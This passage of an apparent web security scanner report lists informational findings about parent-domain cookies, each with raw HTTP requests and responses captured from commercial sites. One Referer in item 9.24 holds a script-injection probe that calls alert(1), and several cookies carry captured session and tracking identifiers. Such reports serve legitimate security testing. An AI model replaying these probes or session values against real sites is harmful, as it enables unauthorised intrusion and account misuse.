P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2966958661410417168; Domain=.audienceiq.com; Expires=Sun, 04-Mar-2012 12:50:52 GMT; Path=/
Content-Type: text/javascript
Content-Length: 87
Date: Tue, 06 Sep 2011 12:50:52 GMT

new Image().src="http://d.turn.com/r/dm/mkt/73/mpid//mpuid/2966958661410417168/nu/n";


9.15. http://ehg-verizon.hitbox.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM50061742AC05EN3&hec=1&vjs=HBX0250.11u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-verizon.hitbox.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBer^Xer@rQe@z%zrzCC"%X%QBer^Xez%X%QBer^Xe"%X%QBer^ir"%X%QBer^Xer@rQe@"%@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; DM580820OHACV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCr^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM5605079NESV6=V1rrrrr"rz%X%QBe%XBQrBrCBXz%zrzr"%X%QBe%XBQz%X%QBe%XBQ"%X%QBe%XBQ"%X%QBe%XBQrBrCBX"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; DM560905OCSMV6=V1rrrrr"rz%X%QBe%CQr%%r^iQz%zrz^C@"%X%QBe%CQrz%X%QBe%CQr"%X%QBeBX^@"%X%QBe%CQr%%r^iQ"@i@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6Q%zA6DTdT:kTHGIWaoF9; DM56050737WDV6=V1rrrrr"rz%X%QBeBQXr@Cre%ez%zrzr"%X%QBeBQXrz%X%QBeBQXr"%X%QBeBQXr"%X%QBeBQXr@Cre%e"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6@%zA6DTdT:kTHGIWaoF9; DM56050762VVV6=V1rrrrr"rz%X%QBeBQCCr^riB^z%zrzr"%X%QBeBQCCz%X%QBeBQCC"%X%QBeBQCC"%X%QBeBQCCr^riB^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6CzA6DTdT:kTHGIWaoF9; DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCrizBz%X@rzr"%X%QBeQX%Xz%X%QBe%Xre"%X%QBeQX%X"%X%QBeQX%XiirCCX"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM5605070DMBV6=V1rrrrr"rz%X%QBeBQ@C^%r@QezBz%X@rzr"%X%QBeQX%Xz%X%QBeBQ@C"%X%QBeQX%X"%X%QBeQX%XiirCCX"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%%@zA6DTdT:kTHGIWaoF9; DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@zBz%XQCzXB"%X%QBeQX%Xz%X%QBer^Xe"%X%QBeQXCQ"%X%QBeQX%XiirCCX"XBz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; WSS_GW=V1z%X%QBXC@CQ; DM560507I8NCV6=V1rrrrr"rz%X%QBe%%%Xrirr%rzBz%X@^zr"%X%QBeQXCQz%X%QBe%%%X"%X%QBeQXCQ"%X%QBeQXCQ^%rQCC"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XrzA6DTdT:kTHGIWaoF9; CTG=1315265345

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:43 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM50061742ACV6=V1rQ(#X"rz%X%QXr^iCBeXr%XQz%zrz%"%X%QXr^iCBz%X%QXr^iCB"%X%QXr^iCX"%X%QXr^iCBeXr%XQ"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XQzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Wed, 05-Sep-2012 11:50:43 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QXr^iCB; path=/; domain=.hitbox.com; expires=Wed, 05-Sep-2012 11:50:43 GMT; max-age=31536000
Set-Cookie: CTG=1315309843; path=/; domain=.hitbox.com; expires=Tue, 13-Sep-2011 11:50:43 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Tue, 06 Sep 2011 11:50:44 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

9.16. http://espanol.vonage.com/mpel.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://espanol.vonage.com
Path:   /mpel.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mpel.js?href=http://www.vonage.com/&ref=http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service&lang=en-US HTTP/1.1
Host: espanol.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Set-Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; Version=1; Domain=.vonage.com; Max-Age=31536000; Expires=Wed, 05-Sep-2012 11:50:14 GMT; Path=/
Content-Length: 0


9.17. http://external.dmtracker.com/tags/vs.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.dmtracker.com
Path:   /tags/vs.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tags/vs.js HTTP/1.1
Host: external.dmtracker.com
Proxy-Connection: keep-alive
Referer: http://servicetips.whitefence.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 5215
Content-Type: application/x-javascript
Last-Modified: Wed, 27 Jan 2010 20:03:11 GMT
Accept-Ranges: bytes
ETag: "80e95bc08b9fca1:662"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP LAW PSA ADM DEV TAI IVA HIS OUR IND"
X-Powered-By: ASP.NET
Set-Cookie: v1st=585D1ECA0A35F6F3; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.dmtracker.com
Date: Tue, 06 Sep 2011 11:59:35 GMT
Connection: close

//Version: JT02
//V1 of Instrumentation Toolkit Addition
//Staging version with staging sensors

var _JT=new Object();
_JT.protocol=location.protocol;//override "https:"
_JT.v="JT01.02";
_JT.ns
...[SNIP]...

9.18. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431 HTTP/1.1
Host: forums.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331687930%3B%20gpv_07%3Dlocalization%2520-%2520shop%7C1315331688369%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":7,"lc":{"d0":{"v":7,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; mbox=session#1315327839174-766376#1315331754|PC#1315327839174-766376.19#1316539494|check#true#1315329954; fsr.a=1315329894622

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:54 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: VISITORID=2086762009; Domain=.comcast.com; Expires=Sat, 06-Sep-2014 05:51:12 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 119084
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

9.19. http://forums.comcast.com/t5/image/serverpage/avatar-name/teddy/avatar-theme/vintage/avatar-collection/toys/avatar-display-size/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /t5/image/serverpage/avatar-name/teddy/avatar-theme/vintage/avatar-collection/toys/avatar-display-size/message

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/avatar-name/teddy/avatar-theme/vintage/avatar-collection/toys/avatar-display-size/message HTTP/1.1
Host: forums.comcast.com
Proxy-Connection: keep-alive
Referer: http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; mbox=session#1315327839174-766376#1315331754|PC#1315327839174-766376.19#1316539494|check#true#1315329954; fsr.a=1315329894622; fsr.s={"v":1,"pv":7,"lc":{"d0":{"v":7,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331694799%3B%20gpv_07%3Dcorporate%2520-%2520learn%2520-%2520xfinity%2520-%2520wireless-mobile-broadband%2520%7C1315331694819%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; VISITORID=2086762009; LiSESSIONID=52B4547347B0428CE9D783866B22AFED

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: VISITORID=2086762009; Domain=.comcast.com; Expires=Sat, 06-Sep-2014 05:51:13 GMT; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Tue, 06 Sep 2011 12:24:55 GMT
Expires: Wed, 05 Sep 2012 12:24:55 GMT
Content-Length: 4621
Connection: close
Content-Type: image/png;charset=UTF-8

.PNG
.
...IHDR...@...$......n......tEXtSoftware.Adobe ImageReadyq.e<....IDATx.LYY.d.Y..sN...........1..I.X.D,B."...    G...\pa$..O.!!q....    ..\p.B .9......x<.........r.o.y...P-MWW..]..y.......C%C.C.D.e.
...[SNIP]...

9.20. http://forums.comcast.com/t5/image/serverpage/image-id/1809i073114C17A65519C/image-dimensions/64x36  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /t5/image/serverpage/image-id/1809i073114C17A65519C/image-dimensions/64x36

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/image-id/1809i073114C17A65519C/image-dimensions/64x36?v=mpbl-1 HTTP/1.1
Host: forums.comcast.com
Proxy-Connection: keep-alive
Referer: http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; mbox=session#1315327839174-766376#1315331754|PC#1315327839174-766376.19#1316539494|check#true#1315329954; fsr.a=1315329894622; fsr.s={"v":1,"pv":7,"lc":{"d0":{"v":7,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331694799%3B%20gpv_07%3Dcorporate%2520-%2520learn%2520-%2520xfinity%2520-%2520wireless-mobile-broadband%2520%7C1315331694819%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; VISITORID=2086762009; LiSESSIONID=52B4547347B0428CE9D783866B22AFED

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: LiSESSIONID=52B4547347B0428CE9D783866B22AFED; Path=/; HttpOnly
Set-Cookie: VISITORID=2086762009; Domain=.comcast.com; Expires=Sat, 06-Sep-2014 05:51:13 GMT; Path=/
Set-Cookie: LithiumUserInfo=""; Domain=.comcast.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Fri, 11 Mar 2011 08:18:50 GMT
Expires: Wed, 05 Sep 2012 12:24:55 GMT
Content-Length: 1238
Connection: close
Content-Type: image/jpeg;charset=UTF-8

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......$.).."..............................
...[SNIP]...

9.21. http://frontier.my.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.my.yahoo.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: frontier.my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:47 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6ImVpMDhxY2Q3NXZjNGQiO3M6MjoibXQiO2k6MTMxNTMxMjE4Nzt9; expires=Fri, 06-Sep-2013 12:29:47 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:29:47 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MYFMP_Sacfea3=d=7142216504e66123b932767.54181906&s=6JRSdtjl3lb3w.8KyXWmOA--; expires=Mon, 05-Sep-2011 12:29:47 GMT; path=/; domain=frontier.my.yahoo.com; httponly
Set-Cookie: MYTMI=4; expires=Wed, 05-Sep-2012 12:29:47 GMT; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 171806

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html class="ua-wk ua-win">
<head>
<script>var gTop = Number(new Date());</script> <script> </s
...[SNIP]...

9.22. http://frontier.my.yahoo.com/e/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.my.yahoo.com
Path:   /e/js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /e/js?_action=show&_subAction=getThumbnail&ids=%5B%22id-482243%22%2C%22id-482610%22%5D&start=0&maxItems=6&test=&_id=a81b32&_tags=%5B%5D&_txnid=2&_crumb=O2TJF8Qm5TbVJKQVIyb0I.&_mode=json HTTP/1.1
Host: frontier.my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; myc=d=lgdbPCk32jI29Q_3alrTFdhUdvOS62KbYqbV15OhgNs5GX2tKBQbpx35R0zRmbc2LUGd9sm6Lxpmg9WFDPpxD__c009fz2GVX66td5mnZiW9ywKdpzLhUpvxPx0_YO8eLJoOmTCvIsU8dDnHSWUDxusuL9oofD8AewPqJHs645ckvFUSiZu58gMSalbacmvEfnPeELo1NplZ5H_oqzFeO8oDRo2YEgWvthq8q6VXUFZGvUFYTsX0Ch0O1C2lcf9XCCOjpDQMZJUMyxiaGSYFyQf7RTgcBtAylyd7gThn4Q1pX01g2Ad71BW5.EMxvBmfLZRYnVhVx2p9Hg3WuT.vWOvGVQqDsCX12VG21FoM&v=2; myc_s=d=nOa115432jLC_cSLwuu_lf4CTd6wQPmHPCA2hP1vQO94THfsuViFbH9mcyI_cr0GP9r0rbetQe8z05xV0Z2o4v5lJRZq8SECI0sk60MsqlHumxoaEan_CngqSvJugqGvksvtgsUNoY8vL9_WpFoPYA5m101VjH_Pitvzb_GmYa019lCJFv2m_NEOXzQtq88.KW.F1SW5xpMo5OCinwcf0GL2rIl_kSrzrG.HFpDrEfGrrxXa18kfeCfkRX1QRTUCkse0NtJ63f4d2bPZUUp6IKxQ.C2G0OdbxWhxiMkjTmH0JcuI3jcyENUWnjYBj6dd7nxfqt_liAQa2Fwu9j37WJ.uQsq4ifKSL7i_6ftSyEgKdKhwyM6bY_BY.daS4egAYqHbhrR.g97x2ik02QNDK01volhxF5DES8RS6IaT3J4kbDJKNubXAO6Y_l02pZGmiRaKpmpaztnZZY_uwIWGVCTbDHJPpswsjyjP5Dcq0XIm1tkmPP2OrOSbmUWmft2JHYnOn2TmUuDZHZWA1X0RI4H8QHD39X5im7fBk7hIskxCD0kfgLG3KUPqJu.EsvuVefk.._mcFbJ0Wtxy4x9x_jt54PqFCbOQoObGtvHFevI25eKgw6kz6OQKwmHA10QFFqyBvqy0abhz9r_HlgX7F6z61jFeREhCedssKNsUjJ.qOvQ39C..SfEF80O7fwUowNksedhAHbANPtVyXDhD0ZlbIeUp_PVZhGmurZ9iB1nbQWrdgzuEOPhhoCHVq3E8RvzDzDJPZ198uGLqzzGoqyyNVyl8yPvY.IGWZBbEWla74QSx6sa5J8C6Z2ckXD_vcuihU_amd6fVcjiXIMr4cHxHd2h.1zlF4gU-&v=2; MYTMI=4; MYTCK=AgBOZhIQAE%2FJEABiqRAAIboQAHvh

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6IjAzZzRmbnA3NmM0aTAiO3M6MjoibXQiO2k6MTMxNTMxMjE5Mjt9; expires=Fri, 06-Sep-2013 12:29:52 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:29:52 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: U_mtupes=deleted; expires=Mon, 06-Sep-2010 12:29:51 GMT; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/json; charset=utf-8
Content-Length: 166

[{"_status":1,"html":null,"_error":"We noticed you may have signed in or signed out in another window. Click OK to reload your page.","_errorCode":2048,"_txnid":"2"}]

9.23. http://gdyn.pgatour.com/1.1/1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gdyn.pgatour.com
Path:   /1.1/1.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1.1/1.gif?1315331430246 HTTP/1.1
Host: gdyn.pgatour.com
Proxy-Connection: keep-alive
Referer: http://www.pgatour.com/.element/ssi/ads/2.0/gdyn_pgatour.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:30 GMT
Server: Apache
X-Netacuity: success
Set-Cookie: adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; expires=Wed, 07 Sep 2011 15:50:30 GMT; domain=.pgatour.com; path=/
Set-Cookie: adDEon=true; expires=Wed, 07 Sep 2011 15:50:30 GMT; domain=.pgatour.com; path=/
Last-Modified: Wed, 01 Dec 2004 19:27:52 GMT
ETag: "d0a8dd-2b-e6d33e00"
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: max-age=60, private
Expires: Tue, 06 Sep 2011 12:51:30 GMT
P3P: CP="NOI DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI COM NAV STA"
Content-Type: image/gif

GIF89a.............!.......,...........D..;

9.24. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add_code=impx-50185&member=30 HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss%003d6ce%27%3balert(1)//9336b0fa1c5
Cookie: uuid2=2230616255569715877; anj=Kfu=8fG7]PE:3F.0s]#%2L_'x%SEV/i#+eB!z6VB-Z@twQ*TwCCvD7is8(MgCt^.O$RtMlE:ZtV:MZGqsO1q2A5/uRmd(QSn'DMBW!Tkfqr^=o6C(jUw_XyuaANf-a(SNp`lEjODQ=yVR!5SwrR.nTl'Xp6Y^Cw%8D0%!6!2Nhw=p3^_TyZV<GWi6Ga]]uLn39N-[xvKC6d*6l?-t<mjC8Pwqv!01113?+OVga; icu=ChII9K4DEAoYASABKAEwzZ_u8gQQzZ_u8gQYAA..; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
